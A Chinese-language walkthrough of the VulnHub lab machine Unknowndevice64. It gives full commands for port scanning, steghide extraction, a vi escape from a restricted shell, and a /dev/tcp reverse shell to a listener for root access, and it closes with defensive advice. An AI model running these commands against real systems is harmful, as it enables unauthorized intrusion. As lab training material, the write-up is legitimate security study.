VulnHub渗透测试Unknowndevice64
字数 871 2025-08-18 11:38:23
VulnHub渗透测试:Unknowndevice64 靶机实战教程
测试环境配置
-
攻击机:
- Kali Linux (IP: 172.17.135.75)
-
靶机:
- Unknowndevice64 (IP: 172.17.135.64)
-
网络配置:
- 确保所有机器在同一网络段
- 测试前确认网络连通性
初始信息收集
端口扫描
使用Nmap进行全端口扫描:
nmap -T4 -A -sS -p 1-65535 -v 172.17.135.64
扫描结果:
- 31337/tcp - http服务
- 1337/tcp - ssh服务
31337端口分析
- 访问http://172.17.135.64:31337
- 查看页面源代码,发现隐藏目录:
key_is_h1dd3n.jpg - 访问该图片:http://172.17.135.64:31337/key_is_h1dd3n.jpg
隐写分析
使用steghide工具提取隐藏信息:
steghide extract -sf key_is_h1dd3n.jpg -p h1dd3n
提取结果:
- 获得文件
h1dd3n.txt,内容为Brainfuck编码
Brainfuck解码
使用在线解码工具解码后获得凭证:
ud64:1M!#64@ud
1337端口SSH登录
使用获取的凭证进行SSH连接:
ssh -p 1337 ud64@172.17.135.64
初始限制:
- 大多数常用命令被禁用
- sudo命令不可用
- vi编辑器可用
受限环境逃逸
- 在SSH会话中启动vi编辑器
- 在vi命令行模式下执行:
!/bin/bash
- 成功获得bash shell
修复环境变量
设置可用的环境变量:
export SHELL="/bin/bash"
export PATH="/usr/bin"
权限提升
反弹Shell提权
- 在Kali上设置监听:
nc -lvp 4444
- 在靶机上执行反弹shell命令:
sudo sysud64 -uroot /bin/bash -c "/bin/sh -i >& /dev/tcp/172.17.135.75/4444 0>&1"
- 成功获得root权限
获取Flag
在root权限下查找并读取flag文件
关键点总结
- 信息收集:全端口扫描是发现非常规服务的关键
- 隐写分析:网页中隐藏的图片可能包含重要信息
- 编码识别:Brainfuck编码需要特殊解码工具
- 受限环境逃逸:利用可用的编辑器功能突破限制
- 提权技术:反弹shell是受限环境下有效的提权方法
- 环境修复:正确设置环境变量可恢复基本功能
防御建议
- 避免在图片中存储敏感信息
- 限制非常规端口上的服务
- 实施严格的命令限制策略
- 监控sudo权限的使用
- 定期审计系统上的特权命令